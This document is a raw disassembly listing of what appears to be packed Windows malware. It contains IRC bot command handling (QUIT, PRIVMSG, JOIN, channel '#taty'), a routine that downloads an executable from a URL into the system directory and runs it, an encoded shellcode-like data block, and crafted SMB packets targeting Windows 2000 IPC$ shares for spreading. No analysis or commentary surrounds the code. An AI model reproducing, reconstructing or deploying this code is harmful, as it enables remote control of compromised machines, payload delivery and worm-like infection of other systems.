xor eax, eax
jmp short loc_3150317D
; ---------------------------------------------------------------------------
loc_3150317A: ; CODE XREF: sub_315030B1+74�j
; sub_315030B1+78�j
push 2
loc_3150317C: ; CODE XREF: sub_315030B1+A0�j
; sub_315030B1+B4�j
pop eax
loc_3150317D: ; CODE XREF: sub_315030B1+C7�j
pop edi
pop esi
leave
retn 4
sub_315030B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503183 proc near ; CODE XREF: sub_315031EC+83�p
; UPX0:315035E9�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31503183 endp
; =============== S U B R O U T I N E =======================================
sub_315031EC proc near ; CODE XREF: UPX0:315035D1�p
mov eax, offset loc_31503AC4
call sub_31503A98 ; _EH_prolog
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; dword_315010C8
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503227: ; CODE XREF: sub_315031EC+EF�j
call sub_31501A32
test eax, eax
jz short loc_31503274
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31503274
call sub_31501D82
test eax, eax
jz short loc_31503258
push 1
call dword_315010E0 ; ExitThread
loc_31503258: ; CODE XREF: sub_315031EC+62�j
mov [ebp-4], ebx
call edi ; dword_315010C8
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503287
mov ecx, esi
call sub_31503183
loc_31503274: ; CODE XREF: sub_315031EC+42�j
; sub_315031EC+59�j ...
xor eax, eax
loc_31503276: ; CODE XREF: sub_315031EC+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503287: ; CODE XREF: sub_315031EC+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032F2
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503722
cmp eax, ebx
jnz short loc_31503274
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_31503274
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503227
; ---------------------------------------------------------------------------
loc_315032E0: ; DATA XREF: UPX0:31503B3C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032F2
retn
; ---------------------------------------------------------------------------
loc_315032F2: ; CODE XREF: sub_315031EC+B2�j
; DATA XREF: sub_315031EC+100�o
push 1
pop eax
jmp loc_31503276
sub_315031EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032FA proc near ; CODE XREF: sub_31503722+9C�p
; sub_31503722+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; dword_315010A0
push [ebp+arg_4]
mov ebx, eax
call esi ; dword_315010A0
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503329
push 1
pop eax
jmp short loc_3150336A
; ---------------------------------------------------------------------------
loc_31503329: ; CODE XREF: sub_315032FA+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; dword_315010A0
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_3150336A: ; CODE XREF: sub_315032FA+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503371 proc near ; CODE XREF: UPX0:31503484�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503AAA ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503AA4 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A9E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_31503371 endp
; ---------------------------------------------------------------------------
loc_31503408: ; DATA XREF: sub_31501D96+140�o
mov eax, offset loc_31503ADB
call sub_31503A98 ; _EH_prolog
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_315061A4, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; dword_31501124
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_315061A0, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_3150345D
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; dword_3150106C
loc_3150345D: ; CODE XREF: UPX0:31503450�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; dword_3150106C
lea ecx, [ebp-2F4h]
call sub_31502DA1
mov [ebp-4], ebx
loc_31503476: ; CODE XREF: UPX0:315035DD�j
; UPX0:31503603�j
push offset dword_315061A8
lea eax, [ebp-18h]
push offset dword_315061AC
push eax
call sub_31503371
add esp, 0Ch
loc_3150348C: ; CODE XREF: UPX0:315034A0�j
call sub_31501A32
test eax, eax
jnz short loc_315034A2
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_3150348C
; ---------------------------------------------------------------------------
loc_315034A2: ; CODE XREF: UPX0:31503493�j
xor ebx, ebx
call esi ; dword_31501124
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_315034BD: ; CODE XREF: UPX0:315034F9�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E14
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_31503550
inc edi
cmp edi, 8
jl short loc_315034BD
xor edi, edi
loc_315034FD: ; CODE XREF: UPX0:3150354C�j
call sub_31501A32
test eax, eax
jz short loc_3150355E
push 1A0Bh
call esi ; dword_31501124
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E14[edx*4]
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_3150355B
inc edi
cmp edi, 4Ch
jb short loc_315034FD
jmp short loc_3150355E
; ---------------------------------------------------------------------------
loc_31503550: ; CODE XREF: UPX0:315034F3�j
push 1
pop ebx
mov ds:dword_315061A4, ebx
jmp short loc_31503567
; ---------------------------------------------------------------------------
loc_3150355B: ; CODE XREF: UPX0:31503546�j
push 1
pop ebx
loc_3150355E: ; CODE XREF: UPX0:31503504�j
; UPX0:3150354E�j
cmp ds:dword_315061A4, 0
jz short loc_31503576
loc_31503567: ; CODE XREF: UPX0:31503559�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpyA
loc_31503576: ; CODE XREF: UPX0:31503565�j
test ebx, ebx
jz short loc_315035EE
call sub_31501A32
test eax, eax
jz short loc_315035EE
loc_31503583: ; CODE XREF: UPX0:315035A8�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_315030B1
test eax, eax
jz short loc_315035AA
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_31503583
loc_315035AA: ; CODE XREF: UPX0:31503594�j
cmp ds:dword_315061A4, 0
jz short loc_315035BA
mov edx, 0A8C0h
jmp short loc_315035CA
; ---------------------------------------------------------------------------
loc_315035BA: ; CODE XREF: UPX0:315035B1�j
call esi ; dword_31501124
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035CA: ; CODE XREF: UPX0:315035B8�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031EC
call sub_31501A32
test eax, eax
jz loc_31503476
lea ecx, [ebp-2F4h]
call sub_31503183
loc_315035EE: ; CODE XREF: UPX0:31503578�j
; UPX0:31503581�j
call esi ; dword_31501124
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503476
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503608 proc near ; CODE XREF: sub_31503722+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31503633
push 1
jmp loc_315036C9
; ---------------------------------------------------------------------------
loc_31503633: ; CODE XREF: sub_31503608+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CF0 ; "\\"
push eax
call edi ; dword_3150106C
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; dword_3150106C
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_315036A9
push 2
jmp short loc_315036C9
; ---------------------------------------------------------------------------
loc_315036A9: ; CODE XREF: sub_31503608+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036CC
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036C9: ; CODE XREF: sub_31503608+26�j
; sub_31503608+9F�j
pop eax
jmp short loc_3150371D
; ---------------------------------------------------------------------------
loc_315036CC: ; CODE XREF: sub_31503608+B4�j
mov edi, 100000h
push edi
call sub_31502800
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_31502814
add esp, 0Ch
xor eax, eax
loc_3150371D: ; CODE XREF: sub_31503608+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31503608 endp
; =============== S U B R O U T I N E =======================================
sub_31503722 proc near ; CODE XREF: sub_315031EC+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_315061AC
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; dword_315010C8
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31503761
and dword ptr [esi+284h], 0
loc_31503761: ; CODE XREF: sub_31503722+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_315037C3
call edi ; dword_315010C8
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_315037C3
lea eax, [esi+180h]
push eax
call sub_31503608
test eax, eax
pop ecx
jnz short loc_315037C3
call edi ; dword_315010C8
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315037C3: ; CODE XREF: sub_31503722+43�j
; sub_31503722+55�j ...
test ebx, ebx
jz loc_31503A01
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 0Ah
jle loc_31503A01
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; dword_31501110
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D3C
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; dword_31501110
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D3C
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmpA
mov ebx, dword_31501088
test eax, eax
jnz loc_31503968
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 0FFh
jge loc_31503968
cmp dword ptr [esi+284h], 0
jnz loc_31503968
cmp dword ptr [esi+7Ch], 0
jnz loc_31503968
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; dword_31501110
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503949
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; dword_31501088
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; dword_31501088
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503956
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503956
cmp ebp, 0E10h
jnb short loc_31503956
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503956
; ---------------------------------------------------------------------------
loc_31503949: ; CODE XREF: sub_31503722+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; dword_31501088
loc_31503956: ; CODE XREF: sub_31503722+1E9�j
; sub_31503722+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506124 ; "|"
push eax
call dword_3150106C ; lstrcatA
loc_31503968: ; CODE XREF: sub_31503722+15A�j
; sub_31503722+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; dword_31501040
test eax, eax
jnz short loc_315039DE
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061CC
push eax
call ebx ; dword_31501088
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506198
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506194
push ds:dword_3150615C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315039DE: ; CODE XREF: sub_31503722+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; dword_31501040
test eax, eax
jnz short loc_315039FE
cmp [esi+284h], eax
jz short loc_315039FE
push 1
pop eax
jmp short loc_31503A2A
; ---------------------------------------------------------------------------
loc_315039FE: ; CODE XREF: sub_31503722+2CD�j
; sub_31503722+2D5�j
mov byte ptr [edi], 7Ch
loc_31503A01: ; CODE XREF: sub_31503722+A3�j
; sub_31503722+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A28
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A28
call dword_31501124 ; rand
loc_31503A28: ; CODE XREF: sub_31503722+E2�j
; sub_31503722+123�j ...
xor eax, eax
loc_31503A2A: ; CODE XREF: sub_31503722+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_31503722 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A38 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A3E proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A44 proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A50 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A70
loc_31503A5C: ; CODE XREF: sub_31503A50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A5C
loc_31503A70: ; CODE XREF: sub_31503A50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A50 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A80: ; DATA XREF: sub_31501D96+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A86 proc near ; CODE XREF: sub_31501F6B+10C�p
; sub_31501F6B+119�p ...
jmp dword_31501118
sub_31503A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8C proc near ; CODE XREF: sub_31501F6B+35�p
jmp dword_31501114
sub_31503A8C endp
; ---------------------------------------------------------------------------
loc_31503A92: ; CODE XREF: UPX0:31503AC9�j
; UPX0:31503AE0�j
jmp dword_31501108+4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A98 proc near ; CODE XREF: sub_315031EC+5�p
; UPX0:3150340D�p
jmp dword_31501108
sub_31503A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9E proc near ; CODE XREF: sub_31503371+4F�p
jmp dword_31501104
sub_31503A9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AA4 proc near ; CODE XREF: sub_31503371+34�p
jmp dword_31501100
sub_31503AA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AAA proc near ; CODE XREF: sub_31503371+1F�p
jmp dword_315010FC
sub_31503AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB0 proc near ; CODE XREF: sub_31502490+AB�p
jmp dword_31501084
sub_31503AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB6 proc near ; CODE XREF: sub_31502490+64�p
jmp dword_3150107C
sub_31503AB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503ABC proc near ; CODE XREF: sub_31502490+2D�p
jmp dword_31501078
sub_31503ABC endp
; ---------------------------------------------------------------------------
align 4
loc_31503AC4: ; DATA XREF: sub_315031EC�o
mov eax, offset dword_31503AE8
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DD4
; ---------------------------------------------------------------------------
loc_31503ADB: ; DATA XREF: UPX0:loc_31503408�o
mov eax, offset dword_31503B40
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 4
dword_31503AE8 dd 19930520h, 2, 31503B08h, 1, 31503B18h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AC4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B30h, 4 dup(0)
dd offset loc_315032E0
dword_31503B40 dd 19930520h, 1, 31503B60h, 5 dup(0) dd 0FFFFFFFFh, 31503AD0h, 526h dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502277+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1F1B966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C571C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B471C999h
dd 99C99998h, 0E3F367C9h, 0D11C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A20414D9h, 99C99998h
dd 9371CAC9h, 99C99998h, 61688DC9h, 0AE1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992671h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993C71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998D12Ch, 0C9C999C9h, 0C9991371h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0D12C66CBh, 99C99998h, 0AE2C66C9h
dd 99C99998h, 990C71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998AEh, 1C71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A20414h, 0C999C999h, 99EA71CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999F171h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0F0ABB7AAh, 2 dup(0C999C999h)
dd 0C5B7C999h, 0ECE9EDFFh, 0FCB7FDE9h, 0C999FCE1h, 6 dup(0C999C999h)
dd 0FCFCF5CAh, 0F2C999E9h, 0FCF7EBFCh, 99ABAAF5h, 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998D51Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FCB75A91h, 0B7FDF7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
